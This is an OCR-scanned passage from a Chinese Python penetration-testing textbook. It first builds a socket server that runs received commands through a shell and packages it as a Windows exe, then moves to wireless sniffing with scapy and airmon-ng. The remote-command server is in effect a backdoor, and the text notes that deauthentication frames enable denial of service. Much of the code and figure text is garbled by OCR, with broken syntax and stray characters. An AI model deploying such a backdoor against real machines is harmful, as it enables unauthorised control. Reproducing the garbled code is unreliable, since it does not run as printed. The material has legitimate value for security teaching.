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与 客户 端 通信 ， 一 定 不 要 用 accept(s1，…) 中 的 那个 sl 与 客户 端 通信 。 然 后 可 以 再 次 调用 
accept(s1，…)， 以 为 下 一 个 客户 端 服务 。 
下 面 来 编写 一 个 服务 端的 程序 ， 这 个 函数 用 来 接收 来 自控 制 端的 命令 并 执行 。 


client_socket = server.accept () 
output = run_command (execute) 
client_socket. send (output) 


先 来 回顾 一 下 以 前 使 用 socket 编写 的 那个 客户 / 服务 端的 程序 。 
服务 端的 代码 如 下 所 示 。 


import socket 
sl = socket.socket () 
sl.bind(("127.0.0.1",2345)) 
sl.listen(5) 
while 1: 
conn,address = sl.accept () 
print "a new connect from",address 
conn.sendall("Hello world") 
conn.close () 


客户 端的 代码 如 下 所 示 。 


import socket 

s2 = socket.socket () 
s2.connect (("127.0.0.1",2345)) 
data = s2.recv(1024) 
s2.close() 

print 'Received', repr (data) 


现在 对 这 两 段 代码 进行 一 些 修 改 ， 使 服务 端 可 以 接受 来 自 客户 端的 输入 ， 首 先 调整 客户 
端的 代码 。 


import socket 

str_msg=input (" 请 输入 要 发 送信 息 : ") 
s2 =Socket .socket 1() 

82 .connect ( (”"127.0.0.1”,2345)) 
s2.send(str_msg) 

print str(s2.recv(1024)) 
s2.close () 


其 次 调整 服务 端的 代码 。 


import socket 
sl = Socket.socket () 
sl.bind(("127.0.0.1",2345)) 
sl.listen (5) 
while 1: 

conn,address = sl.accept () 
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print "a new connect from" ,address 

conn.send("Hello world") 

data=conn.recv(1024) 

print "The command is "+data 
conn.close () 


并 将 执行 命令 的 代码 添加 到 服务 端 ， 调 整 好 的 代码 如 下 所 示 。 


import subprocess 
import socket 
defrun command (command): 
# rstrip() 用 来 删除 string 字符 串 末 尾 的 指定 字符 (默认 为 空格 ) 
command=command.rstrip() 
print command 
trys 
child = subprocess.check output (command, shell=True) 
print child 
except: 
child = "Can not execute the command.\r\n’' 
return child 
sl = socket.socket() 
sl.bind(("127.0.0.1“,2345)) 
sl.listen(5) 
while 1: 
conn,address = sl.accept () 
print "a new connect from",address 
conn.send("Hello world") 
data=conn.recv(1024) 
print "The command is "+data 
output = run_command (data) 
conn. send (output) 
conn.close() 


如 果 和 希望 采用 命令 行 的 控制 方式 ， 则 可 以 对 程序 进行 如 下 修改 。 


import subprocess 
import socket 
def run_command (command) : 
# rstrip() 用 来 删除 string 字符 囊 末 尾 的 指定 字符 (默认 为 空格 ) 
command=command.rstrip() 
print command 
try: 
child = subprocess.check_ output (command, shell=True) 
print child 
except: 
child = "Can not execute the command. \r\n' 
return child 
sl = socket.socket () 
sl.bind(("127.0.0.1",2346)) 
sl.listen(5) 
while 1: 
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conn,address = sl.accept () 
print "a new connect from",address 
conn.send("Hello world") 
data=conn.recv (1024) 
print "The command is "+data 
while 1: 
# 跳出 一 个 窗口 
conn.send('<xy:#> ') 
t 现在 接收 文件 直到 发 现 换行 符 (enter key) 
cmd buffer = '' 
while '\n' not in cmd buffer: 
cmd buffer += conn.recv (1024) 
+ 返还 命令 输出 
response = run command (cmd buffer 
# 返回 响应 数据 
conn.send(response) 
conn.close () 


对 客户 端的 代码 进行 调整 。 


import socket 
s2 = Socket.socket () 
s2.connect (("127.0.0.1",2346) ) 
while 1: 
+ 现在 等 待 数据 回 传 
recv_len = 1 
response = '' 
while recv_len: 
data = s2.recv(4096) 
recv_len = len(data) 
response += data 
if recv_len< 4096: 
break 
print (response, ) 
t 等 待 更 多 输入 
buffer = raw_input("") 
buffer += '\n\n' 
+ 发 送出 去 


s2.send(buffer) 


11.4 将 Python 脚本 转换 为 exe 文件 


如 果 想 要 将 这 个 使 用 Python 语言 编写 远程 控制 工具 变 成 在 Windows 下 可 以 执行 的 exe 
文件 ， 可 以 到 https://sourceforge.net/projects/py2exe/files/?source=navbar 下 载 py2exe 这 个 工 
具 。 这 个 工具 的 作用 就 是 将 py 文件 转换 成 exe。 不 同 的 Python 版 本 对 应 不 同 的 下 载 文 件 ， 
例如 ，Python 2.7 就 需要 下 载 pyt2exe 0.6.9， 在 下 载 的 时 候 要 注意 使 用 对 应 的 版 本 。 但 是 这 个 
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工具 是 不 能 在 Kali Linux 2 下 使 用 的 ， 需 要 安装 到 一 台 Windows 计算 机 中 才能 使 用 。 
这 个 工具 的 安装 方法 很 简单 ， 安 装 的 界面 如 图 11-3 所 示 。 


This Wizard will install py2exe on your computer. Click Next to continue or 
Cancel to exit the Setup Wizard. 


[This package is a distutls extension to buid 
‘standalone Windows executable programs from 


PYTHON theler@python.net 
Description: Build standalone executables for Windows 


Powered 
Maintainer: Jimmy Retzlaff 

Maintainer_email: immyGretzlalf com 

Name: py2Zexe 

Urt http://www. py2exe.org/ 

Version: 069 


Buit Mon Nov 10 20:40:36 2008 with distutis-2 6 
TEW 取消 


图 11-3 pyt2exe 的 安装 界面 


然后 设 定安 装 的 目录 ， 如 图 11-4 所 示 


Python 2 7 is required for this package. Select installation to use: 


PYTHON 
Powered 


Python Directoy. (EN 


Installation Directory: |C NPython27 Libuste-packagesN 


Lomen] __ma 


图 11-4 pyt2exe 的 安装 目录 
现在 将 刚刚 编写 完 的 serverpy 转换 为 Windows 上 的 可 执行 程序 ， 并 运行 在 没有 安装 
Python 的 Windows 系统 上 。 首 先 需要 写 一 个 用 于 发 布 程序 的 设置 脚本 ， 例 如 mysetup.py， 这 
个 脚本 的 内 容 如 下 。 


from distutils.core import setup 


import py2exe 
setup (console=["server.py"]) 
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将 这 个 mysetup.py 和 serverpy 保存 到 Python 的 安装 目录 里 ， 例 如 ， 此 处 安装 目录 就 是 


C:\Python27， 然 后 按 下 面 的 方法 运行 mysetup.py 
首先 在 命令 行 中 切换 到 Ci\Python27， 如 图 11-5 所 示 


图 11-5 切换 到 Ci\Python27 
如 图 11-6 所 示 


然后 在 命令 行 中 执行 “python mysetup.py py2exe”， 


图 11-6 执行 “python mysetup.py py2exe” 


上 面 的 命令 执行 后 将 产生 一 个 名 为 dist 的 子 目 录 ， 其 中 包含 serverexe 、python27.dll、 


library.zip 这 些 文件 ， 如 图 11-7 所 示 
p 这 


_hashlib.pyd 
_socket.pyd 
_ssLpyd 
bz2pyd 

L library 

< python27.dll 
selectpyd 

E] server 
unicodedata.pyd 

E woxpopen 


É 11-7 dist 的 子 目录 


这 里 面 的 server.exe 就 是 需要 的 文件 


小 结 

本 章 中 开始 介绍 渗透 测试 的 一 个 新 的 阶段 。 在 本 章 讲解 了 远程 控制 程序 ， 并 以 Windows 
作为 目标 平台 ， 以 实例 来 介绍 了 如 何 使 用 Python 来 编写 一 个 远程 控制 程序 。 这 个 程序 的 功能 
还 不 完善 ， 读 者 可 以 对 其 进行 进一步 完善 。 在 本 章 的 最 后 介绍 了 如 何 产生 一 个 可 以 将 Python 
程序 转换 为 在 Windows 环境 下 可 以 直接 运行 的 exe 文件 的 方法 。 


12 TARAS (基础 部 分 ) 


今 时 今日 ， 人 们 已 经 越 来 越 离 不 开 无 线 网 络 ， 相 比 起 那 种 极为 不 便利 的 网 线 连接 方式 ， 
这 种 便利 的 无 线 网 络 连接 方式 越 来 越 受 到 人 们 的 喜爱 ， 几 乎 成 为 每 个 单位 和 家 庭 上 网 方式 的 
首选 。 可 是 无 线 网 络 上 网 方式 的 普及 除了 带 来 了 便利 之 外 ， 也 为 网 络 的 安全 带 来 了 更 大 的 危 
险 。 因 为 传统 的 有 线 连接 方式 ， 对 于 设备 的 接 入 往往 有 较 大 的 限制 ， 因 此 外 来 者 在 试图 进入 
某 个 网 络 时 难度 较 大 。 以 前 通过 网 线 连接 计算 机 ， 而 无 线 网 络 则 是 通过 无 线 电 波 联网 ; 常见 
的 就 是 一 个 无 线路 由 器 ， 那 么 在 这 个 无 线路 由 器 的 电波 履 盖 的 有 效 范围 都 可 以 采用 无 线 网 络 
连接 方式 进行 联网 ， 而 无 线 网 络 则 降低 了 这 种 入 侵 的 难度 。 

一 般 架 设 无 线 网 络 的 基本 配备 就 是 无 线 网 卡 及 一 台 AP， 如 此 便 能 以 无 线 的 模式 ， 配 合 
既 有 的 有 线 架构 来 分 享 网 络 资源 ， 架 设 费用 和 复杂 程度 远 远 低 于 传统 的 有 线 网 络 。 如 果 只 是 
几 台 计算 机 的 对 等 网 ， 也 可 不 要 AP， 只 需要 每 台 计 算 机 配备 无 线 网 卡 。AP 为 Access Point 
的 简称 ， 一 般 翻 译 为 “无 线 访问 接 入 点 ”或 “桥接 器 ”。 它 主要 在 媒体 存 取 控 制 层 MAC 中 
扮演 无 线 工作 站 及 有 线 局 域 网 络 的 桥梁 。 有 了 AP， 就 像 一 般 有 线 网 络 的 Hub 一 般 ， 无 线 工 
作 站 可 以 快速 且 轻 易 地 与 网 络 相连 。 特 别 是 对 于 宽带 的 使 用 ， 无 线 保 真 更 显 优 势 ， 有 线 宽带 
网 络 (ADSL、 小 区 LAN £) 到 户 后 ， 连 接 到 一 个 AP， 然 后 在 计算 机 中 安装 一 块 无 线 网 卡 
即 可 。 

通常 这 个 AP 是 由 无 线路 由 器 实现 ， 通 常 的 入 侵 方式 包括 无 线 网 络 密码 的 破解 、 路 由 器 
的 控制 等 。 在 Kali Linux 2 中 专门 有 一 个 分 类 的 工具 集合 都 是 针对 无 线 网 络 的 ， 这 里 就 包括 
极为 著名 的 aircrack-ng、kismet 等 。 在 本 章 中 将 会 围绕 如 下 几 点 就 如 何 使 用 这 些 工具 来 讲解 。 
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(1) 无 线 网 络 基础 。 

(2) Kali Linux 2 中 的 无 线 设置 。 

(3 ) 如 何 使 用 Python 语言 对 无 线 网 络 进行 扫描 。 

(4) 如 何 使 用 Python 语言 编写 一 个 无 线 数 据 嗅 探 器 。 

(5) 如 何 使 用 Python 语言 扫描 某 一 个 无 线 网 络 中 的 客户 端 。 
(6) 如 何 使 用 Python 语言 找 出 隐藏 的 AP。 

(7) 如 何 使 用 Python 语言 捕获 网 络 中 的 加 密 数 据 包 。 


12.1 无 线 网 络 基 础 


在 当今 社会 中 ， 无线 网 络 要 比 有 线 网 络 具 备 更 大 的 竞争 力 ， 它 更 适合 应 用 于 现代 化 的 企 
业 和 家 庭 。 目 前 的 无 线 网 络 大 都 采用 了 802.11 作为 标准 ， 经 常 提起 的 WiFi 使 用 的 就 是 这 个 
标准 。 无 线 网 络 的 常见 组 建 方式 有 两 种 ， 分 别 是 Ad-hoc 和 Infrastructure 模式 。 

(1 ) Infrastructure : 无 线 网 与 有 线 网 通过 一 接 入 点 来 进行 通信 ， 这 个 接 入 点 被 称 为 AP 
(Access Point) 

(2 )Ad-hoc 模式 : 带 有 无 线 设备 的 计算 机 之 间 直 接 进 行 通信 (类 似 有 线 网 络 的 双 机 互联 )。 

现在 的 无 线 网 络 大 都 会 采用 Infrastructure 模式 ， 在 这 种 模式 下 ，AP 会 以 极 快 的 速度 向 
外 发 送 Beacon 帧 ， 以 向 外 界 声明 自身 的 存在 。 这 个 Beacon 帧 中 包含 无 线 网 络 中 的 信息 ， 例 
如 定义 了 无 线 网 络 名 字 的 SSID ， 有 时 也 会 包含 该 无 线 网 络 支 持 的 传输 速率 、 所 使 用 的 通道 
和 应 用 的 安全 机 制 。 客 户 端 收 到 了 这 个 Beacon 帧 之 后 ， 就 可 以 获悉 这 个 无 线 网 络 的 存在 。 

另 一 种 客户 端 获取 无 线 网 络 存 在 的 方法 是 由 客户 端 发 送 探测 请 求 ( probe requests), AP 
在 收 到 了 探测 请 求 之 后 ， 会 返回 一 个 探测 回应 (Probe response)， 然 后 客户 端 会 向 AP 发 
送 一 个 认证 (authentication) 数据 包 ， 如 果 认 证 成 功 ， 客 户 端 会 发 送 关联 请 求 (association 


request), AP 在 收 到 这 个 数据 包 之 后 ， 就 会 回复 一 个 关联 响应 amaya =. 
(association response) 

实际 上 ， 最 关心 的 是 客户 端 与 AP 连接 的 过 程 ， 接 下 来 简 | 606 bi 
单 讲解 一 下 这 两 者 连接 的 建立 。 有 < 

(1) AP 会 不 断 地 向 外 广播 Beacon 帧 ， 而 此 时 的 客户 端 通 | == = 
过 无 线 网 卡 就 会 收 到 这 个 数据 包 ， 接 着 就 会 在 无 线 连接 列表 中 | oue 
显示 出 这 个 AP, 例如 ,图 12-1 显示 出 所 有 可 以 连接 的 AP。 

(2) 可 以 手动 使 用 客户 端 连 接 到 指定 的 AP， 当 单 击 “ 连 | ` 
接 ” 按 钮 的 时 候 ， 客 户 端的 无 线 网 卡 就 会 向 这 个 AP 发 送 一 个 | UE bs 


Probe 请 求 (Probe request)， 用 来 发 起 连接 请 求 。 图 12-1 所 有 可 以 连接 的 AP 
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(3) AP 在 收 到 客户 端 发 来 的 Probe 请 求 之 后 ， 如 果 同 意 建立 这 个 连接 ， 就 会 向 客户 端 
返回 一 个 Probe 应 答 (Probe response). 

(4) 客户 端 对 目标 AP 请 求 进 行 身份 认证 ， 发 送 一 个 authentication WR (authentication 
request); 

(5) AP 对 客户 端的 身份 认证 authentication 请求 做 出 回应 ， 发 送 一 个 authentication 应 答 
(Probe response). 

(6) 客户 端 向 AP 发 送 连接 请 求 ， 发 送 一 个 association 请 求 (authentication request). 

(7) AP 对 连接 请 求 进行 回应 ， 发 送 一 个 association 应 答 (association response) o 

在 上 述 这 个 过 程 中 ,会 涉及 如 下 所 示 的 数据 帧 。 

(1 ) Beacon 信 标 帧 ， 用 来 宣告 某 个 网 络 的 存在 。AP 定期 向 外 发 送 的 Beacon 信 标 帧 ， 可 
让 客户 端 得 知 该 网 络 的 存在 。 

(2 ) Probe request 探测 请 求 帧 ， 客 户 端 会 利用 Probe request 帧 ， 扫 描 所 在 区 域内 目前 有 
哪些 802.11 网 络 。 

(3 ) Probe response 探测 响应 帧 ， 如 果 Probe request 帧 所 探测 的 AP 与 客户 端 相 兼容 ， 该 
AP 就 会 以 Probe esponse 帧 应 答 。 

(4) Authentication request 身份 认证 帧 ， 由 客户 端 发 给 AP 用 以 表明 自己 身份 的 
Authentication request 帧 ， 用 来 完成 身份 验证 。 

(5) Authentication response 身份 认证 帧 ， 由 AP 发 送 给 客户 端的 表示 接受 或 者 拒绝 这 次 
连接 的 Authentication response 帧 。 

(6) Association request 关联 请 求 ， 一 旦 客户 端 找到 AP 并 通过 身份 验证 ， 就 会 发 送 
Association request Ili 

(7) Association response 关联 响应 ， 当 客户 端 试图 关联 AP BJ, AP 会 回复 一 个 关联 响 
应 帧 。 

(8 ) Disassociation 解除 关联 。 

(9 ) Deauthentication 终结 认证 。 


12.2 Kali Linux 2 中 的 无 线 功 能 


12.2.1 无线 嗅 探 的 硬件 需求 和 软件 设置 

现在 已 经 基本 了 解 了 无 线 网 络 连 接 的 过 程 。 在 开始 无 线 渗透 之 旅 之 前 ， 必 须 做 好 硬件 和 
软件 的 准备 。 需 要 注意 的 是 ， 可 能 现在 你 手头 的 计算 机 和 网 卡 并 不 能 获取 到 网 络 中 的 无 线 流 
量 ， 所 以 可 能 需要 做 出 一 点 儿 改变 。 
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首先 必须 有 一 块 支持 无 线 嗅 探 的 网 卡 ， 注 意 并 非 所 有 的 USB 外 接 网 卡 都 可 以 做 到 这 一 
点 。 本 书 中 介绍 的 实例 都 是 采用 了 一 款 支持 Kali 虚拟 机 的 外 接 无 线 网 卡 ， 今 时 今日 这 种 设备 
在 淘宝 上 随处 可 见 ， 价 格 也 只 有 几 十 块 钱 而 已 ， 可 以 很 容易 地 购买 到 这 种 设备 。 需 要 注意 的 
是 ,一定 要 支持 在 虚拟 机 中 运行 Kali Linux 2。 

在 得 到 这 个 设备 之 后 ， 就 可 以 在 VMware 虚拟 机 中 进行 渗透 测试 ， 首 先 需要 将 无 线 网 卡 
I US s ; i 在 虚拟 机 中 进行 如 下 设置 ， 依 次 选中 “可 移动 设备 ”一 你 的 无 线 
网 卡 的 名 称 (这 里 使 用 的 是 “Ralink 802.11 nWLAN”) 一 “连接 ( 断 开 与 主机 的 连接 交 ， 如 
图 12-2 所 示 


ESU 


P S Ceris A+ Del) 


MERAN + Ralink 80211 n WLAN | 


) RN) » 
WE88 O Chl+Ah+prsan 


q wm 
更 W VMware Tools(T).. 


£) ao. 


图 12-2 将 Kali Linux 2 虚拟 机 与 无 线 网 卡 连接 


在 Kali Linux 2 虚拟 机 中 ， 打 开 一 个 终端 ， 检 测 这 个 网 卡 是 否 已 经 正常 工作 ， 这 里 可 以 
使 用 命令 “ifconfig” 来 查看 网 络 连接 情况 ， 如 图 12-3 所 示 


eth0: fla 


4 bytes 92315 (90.1 KiB) 
verruns © frame 9 
9 KiB) 
Ə carrier 0 collisions 0 


opeid 0x10<host> 
Loopback) 
2 


ð carrier © collisions 0 


n 1090 (Ethernet) 


ped © uns © frame 9 


6 0.0 
dropped © overi Fë 9 carrier @ collisions 0 


图 12-3 ”使 用 命令 “这 onfig” 来 查看 网 络 连 接 情况 


这 时 出 现 的 wlan0 就 是 刚刚 插入 的 无 线 网 卡 ， 现 在 这 块 网 卡 已 经 开始 工作 了 ， 但 是 还 不 
要 高 兴 得 太 早 ， 因 为 还 需要 进行 下 一 步 检测 。 
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在 终端 中 输入 命令 来 启动 wlan0。 
root@kali: airmon-ng start wlan0 


执行 这 之 后 ， 很 快 会 出 现 如 图 12-4 所 示 的 界面 


PHY Interface ve Chipset 


phy2 wlan0 usb Ralink Techi Corp. RT5370 
图 12-4 开启 monitor 模式 
这 时 耐心 等 待 一 小 会 儿 ， 如 果 出 现 了 如 图 12-5 所 示 的 界面 ， 那 么 恭喜 ， 你 的 网 卡 可 以 
使 用 了 ， 如 图 12-5 所 示 


图 12-5 成功 创建 wlan0mon 接口 


刚才 的 工作 其 实 是 将 网 卡 设置 为 监听 模式 ， 而 且 系统 使 用 无 线 网 卡 建立 了 一 个 新 的 接口 
“wlan0mon”， 在 接 下 来 的 应 用 中 都 将 使 用 这 个 接口 


12.2.2 无线 渗 透 使 用 的 库 文件 

本 章 的 实例 中 需要 两 个 库 ， 一 个 是 已 经 很 熟悉 的 Scapy 库 。 另 一 个 是 python-wif 库 ， 首 
先 介绍 一 下 Scapy 库 中 数据 包 类 与 12.2.1 节 中 数据 帧 中 的 对 应 关系 

Dotll, ARAURA, š 这 个 帧 的 格式 可 以 使 用 ls 命令 来 查看 ， 如 图 12-6 所 示 。 


s(Dot11()) 
BitField (4 bits) (0) 
BitEnumFietd (2 bits) (0) 
BitField (2 bits) 6 (0) 
Field (8 bits) 6 (9) 
Field (0) 


ield '00:00:00:00:00:00' ('00:00:00:00:00:00' 
Dot1lAddr2MACField '00:00:00:00:00:00' ('00:00:00:00:00:00' 
Dot1lAddr3MACField '00:00:00:00:00:00' ('00:00:00:00:00:00' 
Dot11SCField (0) 
Dot11Addr4MACField 00:00:00:00:00:00' ('00:00:00:00:00:00' 


图 12-6 使 用 ls 命令 来 查看 Dotll 类 的 格式 
除了 Dotll 之 外 ，Scapy 库 中 还 有 很 多 类 ， 这 些 类 的 名 称 和 作用 分 别 如 下 。 
(1) Dotl1Beacon， 这 个 类 对 应 着 Beacon 信 标 帧 。 
(2) DotllProbeReq， 这 个 类 对 应 着 Probe request 数据 帧 。 
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(3) DotllProbeResp， 这 个 类 对 应 着 Probe response 数据 帧 。 

(4) Dotl1AssoReq， 这 个 类 对 应 着 Association request 数据 帧 。 

(5) Dotl1AssoResp， 这 个 类 对 应 着 Association response 数据 帧 。 

(6) DotllAuth， 这 TAN Authentication 数据 帧 。 

(7) Dotl1Deauth， 这 个 类 对 应 着 Deauthentication 数据 帧 ， 解 除 认证 ， 可 以 用 来 实现 拒 
绝 服务 攻击 。 

(8) Dotl1WEP， 无 线 链 路 承载 的 上 层 数据 被 加 密 后 ， 放 在 这 里 。 

关于 Scapy 这 个 库 在 前 面 的 章节 中 已 经 详细 介绍 过 ， 这 里 不 再 袭 述 。 这 里 简单 介绍 一 
另外 一 个 python-wif 库 的 使 用 方法 ， 这 个 库 可 以 很 方便 地 实现 无 线 网 络 上 的 操作 

fE Kali Linux 2 中 安装 python-wifi 库 的 命令 如 下 所 示 

rootekali: ~ # pip install python-wifi 

这 条 命令 执行 的 结果 如 图 12-7 所 示 


:~# p ll python-wifi 
Collecting pyt 

wnloadin fi-0.6.1.tar 

100 kB 60kB/s 
Bartang e å ython | 


g collected packages: python-wifi 
fully installe! wifi-0.6.1 


图 12-7 安装 python-wifi 库 
下 面 给 出 了 一 个 这 个 库 的 简单 用 法 


>>> from pythonwifi.iwlibs import Wireless 
>>> wifi=Wireless('wlan0') 

>>> wifi.getMode () 

"Managed ' 


12.3 AP 扫描 器 


本 章 中 考虑 的 第 一 个 问题 边 都 存在 哪些 无 线 网 络 ， 只 有 先 找到 这 些 无 线 网 络 之 
A, dn was Kali Linux 2 中 找到 这 些 AP 并 不 困难 ， 只 需要 在 终端 中 输入 如 
下 命令 


root@kali: ~ # airodump-ng wlan0mon 
这 时 就 会 查找 所 有 可 以 连接 的 无 线 网 络 。 如 果 已 经 找到 了 目标 网 络 ， 可 以 使 用 Ctrl+C 组 
合 键 结束 这 个 搜索 。 图 12-8 中 给 出 了 作者 的 设备 所 能 搜索 到 的 所 有 无 线 网 络 。 
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网 络 


在 ， 
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CIPHER AUTH ESSID 


TP-LINK 2AA6 
TP-LINK £ 


ChinaNet-ucT 
ChinaNet-vhr 


图 12-8 搜索 到 的 所 有 无 线 网 络 
这 是 一 个 以 表格 形式 展示 的 无 线 网 络 信息 ， 每 一 列 代表 的 含义 如 下 所 示 


BSSID 热点 的 MAC 地 址 

PWR 无 线 的 信号 强度 或 水 平 

Beacons 无 线 发 出 的 通告 编号 

ENC 加 密 方法 ， 包 括 WPA2、WPA、WEP、OPEN 

CH 工作 频道 

AUTH 使 用 的 认证 协议 

ESSID 无 线 网 络 名 称 

接 下 来 编写 一 个 功能 相同 的 无 线 网 络 扫描 器 ， 这 个 扫描 器 用 来 扫描 当前 可 以 连接 的 无 线 


， 原 理 很 简单 ， 由 于 AP 会 不 断 地 向 外 部 发 送 Beacon 信 标 帧 ， 用 来 宣告 自身 网 络 的 存 
而 只 需要 使 用 设备 来 捕获 所 有 这 些 Beacon 信 标 帧 ， 并 将 其 中 的 信息 显示 出 来 即 可 


from scapy.all import * 
interface = 'wlan0mon' 
ap_list = [] 
def info(fm): 
if fm.haslayer (DotllBeacon): 
if fm.addr2 not in ap list: 
ap_list.append (fm.addr2) 
print "SSID--> ",fm.info,"-- BSSID --> ",fm.addr2 
sniff (iface=interface,prn=info) 


把 这 个 程序 保存 在 Aptana Studio 3 中 执行 ， 执 行 的 结果 如 图 12-9 所 示 。 


© Console x x s 9, 


<terminated> /root/Documents/Aptana Studio 3 Workspace/test1/test1_py 
SSID--> ZHA0JI -- BSSID --> 7 

CMCC-WEB -- BSSID --> 
TP-LINK DB3D - 
and-Business - 


-- BSSID --> 
TP-LINK 6920CA 
TP-LINK 96FC - 


图 12-9 使 用 Scapy 编写 程序 扫描 到 的 无 线 网 络 
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另外 ， 也 可 以 使 用 库 pythonwifi.iwlibs 来 编写 一 个 功能 相同 的 无 线 网 络 扫描 器 ， 这 个 扫 
描 器 可 以 扫描 当前 可 以 连接 的 无 线 网 络 ， 和 前 面 的 程序 功能 相同 。 


from pythonwifi.iwlibs import Wireless 
wifi = Wireless ("wlan0") 
print "BSSID " +"Signal "+"Frequency "+"ESSID" 
for ap in wifi.scan(): 
print ap.bssid+N 
" "+str(-(ap.quality.getSignallevel())+N 
" "+str(ap.frequency.getFrequency())+N 
" "+ap.essid 


把 这 个 程序 保存 在 Aptana Studio 3 中 执行 ， 执 行 的 结果 如 图 12-10 所 示 。 


© Console x |W root@ka... © Problems Fi PyUnit W root@ka... Sie 


= x 9 Q, aA BBB = = + r+ 


<terminated> /root/Documents/Aptana Studio 3 Workspace/test/test.py 


BSSID Signal Frequency ESSID a 
00:4C:02:0C:1B:44 183 2412000000 USER_0C1B42 
DC:FE:18:58:8C:3B 185 2412000000 TP-LINK_8C3B 

173 2457000000 ChinaNet-ucTF 

177 2462000000 HUAWEI-VS9GSF 

173 2447000000 ChinaNet-vhrw 

: 175 2412000000 ”宝宝 

0E:1F:6F:36:DC:8D 171 2437000000 CMCC 
A8:57:4E:C3:53:2A 175 2437000000 ZHA0JI 
12:1F:6F:36:DC:8D 169 2437000000 and-Business w 


图 12-10 使 用 pythonwifi 编写 程序 扫描 到 的 无 线 网 络 


124 ”无 线 数据 嗅 探 器 


从 12.3 节 中 可 以 看 到 大 部 分 的 AP 都 工作 在 channel 6， 所 以 这 里 将 捕获 数据 的 频道 调整 
到 channel 6， 使 用 的 命令 如 下 所 示 : 

root@kali: ~ # iwconfig wlan0mon channel 6 

另外 ， 如 果 读 者 在 阅读 这 一 节 之 前 关闭 过 计算 机 ， 就 会 发 现 wlan0mon 已 经 不 见 了 ， 系 
统 的 网 卡 重新 又 变 回 了 wlan0， 针 对 这 一 点 可 以 在 程序 中 使 用 subprocess 类 调整 ， 使 用 的 命 
令 语句 为 : 


import subprocess 
subprocess.call('airmon-ng start wlan0',shell=True) 


其 实 ， 这 里 就 是 利用 subprocess 在 程序 中 执行 了 'airmon-ng start wlan0' 这 条 命令 。 这 样 
就 无 须 每 次 重启 都 在 终端 中 输入 命令 了 。 
捕获 网 络 中 无 线 数 据 包 的 方法 与 有 线 数据 包 的 一 样 ， 都 使 用 了 sniff) 函数 ， 需 要 注意 的 


242 »® Python 渗透 测试 编程 技术 : 方法 与 实践 


是 只 有 使 用 的 网 卡 不 同 。 


from scapy.all import * 
import subprocess 
subprocess.call('airmon-ng start wlan0',shell=True) 
iface = "wlan0mon" 
def dump packet (pkt) : 
print pkt.summary() 
while True: 
sniff (iface=iface,prn=dump_packet, count=10, timeout=3, store=0) 


同样 执行 这 个 程序 ， 可 以 看 到 捕获 了 大 量 的 无 线 流 量 ， 如 图 12-1 所 示 。 


[E Console x 
[<terminated> /root/Documents/Aptana Studio 3 Workspace/test1/testl.py 

PHY Interface Driver Chipset 

phye MLangmon rt2806usb Ralink Technology, Corp. RT5379 


ff / DotllBeacon / 55ID='ZHAOJI" / Dotl 
/ DotllBeacon / SSID='dlink' / Dotlli 
7 DotllAuth 


RadioTap / 802.11 Management 8L al 


/ DotllAuth 
ff / DotllBeacon / 55ID='Chinaner-vhrw' 
ff / DotllBeacon / SSTD='ChinaNet-ucTF' 
ff / DotllBeacon / SSID-'ChinaNet ucTF' 
ff / DolllBeacon / 55ID='TP-LINK 60CE' 


RadioTap / 802.11 Management 11L 
RadioTap / 
RadioTap / 
RadioTap / 
RadioTap / 
RadioTap / 
RadioTap / 


RadioTap / 
RadioTap / 


图 12-11 编写 程序 捕获 网 络 中 的 无 线 流量 


12.5 无 线 网 络 的 客户 端 扫描 器 


按照 12.1 节 中 给 出 的 无 线 连接 过 程 ， 每 一 个 无 线 设备 在 和 AP 连接 的 时 候 都 需要 向 其 发 
送 一 个 ProbeReq 数据 包 ， 而 AP 会 返回 一 个 pT 数据 包 。 这 样 只 要 捕获 到 网 络 中 的 所 
有 ProbeReq 数据 包 ， 就 可 以 知道 当前 网 络 中 有 哪些 设备 连接 到 AP 上 。 

这 里 搭建 一 个 热点 并 命名 为 test， 然 后 编写 如 下 程序 。 在 这 个 程序 中 指定 参数 为 test， 然 
后 执行 该 程序 。 这 个 程序 会 捕获 客户 端 与 AP 连接 的 所 有 ProbeReq 数据 包 。 下 面 给 出 了 这 个 
程序 的 全 部 代码 。 


from scapy.all import * 
import subprocess 
subprocess.call('airmon-ng start wlan0',shell=True) 
interface ='wlan0mon' 
probe_req = [] 
def probesniff (fm): 
if fm.haslayer (DotllProbeReq): 
if fm.addr2 not in probe req: 
print "New Probe Request for: ", fm.info 
print "The Probe is from MAC ", fm.addr2 


probe req.append (fm.addr2) 
sniff (iface= interface,prn=probesniff) 


个 程序 执行 的 结果 如 图 12-12 所 示 。 


ied 个 程序 之 后 ，fm.info 中 并 没有 显示 出 AP 的 名 称 ， 所 以 需要 对 这 
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程序 进行 


一 些 调整 ， 将 Dotl1ProbeReq 替换 为 Dotl1ProbeResp。 修 改 完 的 程序 如 下 所 示 。 


from scapy.all import * 
import subprocess 
interface ='wlan0mon' 
probe_req = [] 

def probesniff (fm): 


if fm.haslayer (DotllProbeResp): 
if fm.addr2 not in probe req: 


print "New Probe Request for: ", fm.info 
print "The Probe is from MAC ", fm.addr2 


probe_req.append (fm.addr2) 
sniff (iface= interface,prn=probesniff) 


这 个 程序 执行 的 结果 如 图 12-13 所 示 。 


© Console x l 


/root/Documents/Aptana Studio 3 Workspace/testl/testl.py 
New Probe Request for: 

The Probe is from MAC da:al:19:59:9d:51 

New Probe Request for: 

The Probe is from MAC da:al:19:92:39:63 

New Probe Request for: 

The Probe is from MAC da:al:19:b3:88:89 


© Console x 


/root/Documents/Aptana Studio 3 Workspace/test1/test1.py 
New Probe Request for: ChinaNet-ucTF 
The Probe is from MAC 68:8a:f0:e7:e4:d8 
New Probe Request for: CMCC 

The Probe is from MAC Qe:1f:6f:36:dc:8d 
New Probe Request for: and-Business 
The Probe is from MAC 12:1f:6f:36:dc:8d 
New Probe Request for: CMCC-EDU 

The Probe is from MAC 06:1f:6f:36:dc:8d 
New Probe Request for: CMCC-WEB 

The Probe is from MAC Qa:1f:6f:36:dc:8d 
New Probe Request for: TP-LINK_4938 
The Probe is from MAC b0:95:8e;3c:49:38 
New Probe Request for: OJI 

The Probe is from MAC a8:57:4e:c3:53:2a 
New Probe Request for: TP-LINK_6920CA 
The Probe is from MAC 28:2c:b2:69:20:ca 
New Probe Request for: TP-LINK_DB3D 
The Probe is from MAC 34:96:72:5f:db:3d 
New Probe Request for: TP-LINK_LSH 

The Probe is from MAC 20:6b:e7:d5:f8:5b 
New Probe Request for: TP-LINK_658366 
The Probe is from MAC ec:88:8f:65:83:66 


图 12-12 编写 程序 捕获 到 的 ProbeReq 
数据 包 


